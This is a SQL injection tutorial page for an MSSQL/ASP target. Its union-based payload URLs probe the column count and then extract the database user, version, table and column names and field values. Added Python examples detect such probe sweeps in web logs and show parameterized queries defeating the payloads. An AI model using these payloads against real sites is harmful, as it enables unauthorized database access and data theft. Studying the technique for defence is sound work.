SQL Injection Walkthrough part IV
UNION SQL INJECTION - DETECTION
Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1--
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
NO ERROR
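From the defender's side, the probing sequence above leaves a recognisable trace: one client sending the same parameter with UNION SELECT and an increasing number of columns, getting error responses until the count matches. The following detector is an added example, not part of the original walkthrough; the access log lines are constructed for it (Combined Log Format, invented addresses and timestamps), and the 500-for-error / 200-for-success mapping is an assumption about how the vulnerable application surfaces database errors.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (Combined Log Format). Addresses, paths and
# timestamps are invented for this example; the probe sequence mirrors the
# walkthrough's column-count detection step.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page.asp?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /page.asp?id=1%20UNION%20SELECT%20ALL%201-- HTTP/1.1" 500 812 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /page.asp?id=1%20UNION%20SELECT%20ALL%201,2-- HTTP/1.1" 500 812 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:42 +0000] "GET /page.asp?id=1%20UNION%20SELECT%20ALL%201,2,3-- HTTP/1.1" 500 812 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:43 +0000] "GET /page.asp?id=1%20UNION%20SELECT%20ALL%201,2,3,4-- HTTP/1.1" 200 6011 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /page.asp?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
# UNION SELECT / UNION ALL SELECT, case-insensitive, after URL decoding.
UNION_RE = re.compile(r'\bunion\b\s+(?:all\s+)?select\b', re.IGNORECASE)
# A bare list of numeric placeholders terminated by a comment: the column-count probe.
PROBE_COLS_RE = re.compile(
    r'\bselect\b\s+(?:all\s+)?((?:\d+\s*,\s*)*\d+)\s*--', re.IGNORECASE
)


def decode_fully(path, rounds=3):
    """URL-decode until the string stops changing (bounded), so a
    double-encoded payload does not slip past the pattern match."""
    for _ in range(rounds):
        decoded = unquote_plus(path)
        if decoded == path:
            break
        path = decoded
    return path


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = decode_fully(rec["path"])
    return rec


def flag_union_probes(log_text):
    """One finding per request whose decoded URL carries a UNION SELECT.
    'columns' is the probe's column count when the request looks like a
    column-count probe, else None."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not UNION_RE.search(rec["decoded"]):
            continue
        pm = PROBE_COLS_RE.search(rec["decoded"])
        cols = pm.group(1).count(",") + 1 if pm else None
        findings.append({"ip": rec["ip"], "status": int(rec["status"]),
                         "columns": cols, "path": rec["decoded"]})
    return findings


def column_count_sweeps(findings):
    """Group probes by client and report clients whose probes step up one
    column at a time; 'succeeded' means the last probe no longer errored,
    i.e. the client found the target list width."""
    by_ip = {}
    for f in findings:
        if f["columns"] is not None:
            by_ip.setdefault(f["ip"], []).append(f)
    sweeps = {}
    for ip, fs in by_ip.items():
        counts = [f["columns"] for f in fs]
        ascending = len(counts) >= 2 and all(b == a + 1 for a, b in zip(counts, counts[1:]))
        if ascending:
            sweeps[ip] = {"probes": counts, "succeeded": fs[-1]["status"] < 500}
    return sweeps


if __name__ == "__main__":
    for ip, info in column_count_sweeps(flag_union_probes(SAMPLE_LOG)).items():
        print(ip, info)
```

Alerting on the sweep rather than on any single UNION keyword keeps the rule useful on sites where the word appears legitimately in search terms; the decoded path is kept in each finding so an analyst can see exactly which parameter was being probed.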
UNION SQL INJECTION - EXTRACT DATABASE USER
http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--
[DB USER]
UNION SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4--
[DB NAME]
UNION SQL INJECTION - EXTRACT DATABASE VERSION
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--
[DB VERSION]
UNION SQL INJECTION - EXTRACT SERVER NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--
[SERVER NAME]
UNION SQL INJECTION - EXTRACT DATABASE TABLES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--
[TABLE NAME 1]
UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--
[COLUMN NAME 1]
UNION SQL INJECTION - EXTRACT 1st FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--
[FIELD 1 VALUE]
UNION SQL INJECTION - EXTRACT 2nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1--
[FIELD 2 VALUE]
UNION SQL INJECTION - EXTRACT 3rd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--
[FIELD 3 VALUE]
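Every step in the walkthrough works only because the value of the id parameter is pasted into the SQL text, so the UNION and the trailing comment are parsed as part of the statement. The example below is added here and is not part of the original page: it builds a four-column table in an in-memory SQLite database (the walkthrough targets MSSQL through ASP, so the error text differs, but the column-count behaviour of UNION is the same), runs the walkthrough's four detection probes through a concatenating lookup and through a parameterized one, and shows that the bound parameter never reaches the parser. The table, rows and function names are constructed for this example.

```python
import sqlite3


def make_db():
    # Constructed sample schema: four columns, matching the four-wide target
    # list that the walkthrough's probing discovers.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, title TEXT, body TEXT, author TEXT)")
    conn.execute("INSERT INTO pages VALUES (1, 'Welcome', 'Hello', 'admin')")
    conn.execute("INSERT INTO pages VALUES (2, 'About', 'Us', 'editor')")
    return conn


def lookup_vulnerable(conn, user_id):
    # The pattern behind page.asp?id=: the raw parameter becomes SQL syntax.
    sql = "SELECT id, title, body, author FROM pages WHERE id=" + user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    # Bound parameter: the driver hands the value to the engine as data, so
    # 'UNION' and '--' inside it are never tokenised as SQL.
    sql = "SELECT id, title, body, author FROM pages WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(lookup, conn, payload):
    """Classify one request the way the walkthrough reads the response:
    'error' when the database rejects the statement, else the row count."""
    try:
        return len(lookup(conn, payload))
    except sqlite3.Error:
        return "error"


# The walkthrough's detection sequence, verbatim.
PROBES = [
    "1 UNION SELECT ALL 1--",
    "1 UNION SELECT ALL 1,2--",
    "1 UNION SELECT ALL 1,2,3--",
    "1 UNION SELECT ALL 1,2,3,4--",
]


def compare(conn):
    """Outcome of each probe against both lookups, plus a legitimate id to
    show the parameterized version still serves normal requests."""
    return {
        "vulnerable": [probe(lookup_vulnerable, conn, p) for p in PROBES],
        "parameterized": [probe(lookup_parameterized, conn, p) for p in PROBES],
        "parameterized_valid_id": probe(lookup_parameterized, conn, "1"),
    }


if __name__ == "__main__":
    for name, result in compare(make_db()).items():
        print(f"{name}: {result}")
```

Against the concatenating lookup the first three probes fail with a column-count error and the fourth returns an extra row (the UNION'd constants), which is exactly the "NO ERROR" signal the walkthrough waits for. Against the parameterized lookup all four return no rows and no error, because the whole string is compared with the integer column as a single value; the difference in behaviour is also why an application that keeps the concatenating pattern but hides error messages is not fixed, only quieter.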
Labels: SQL TUTORIAL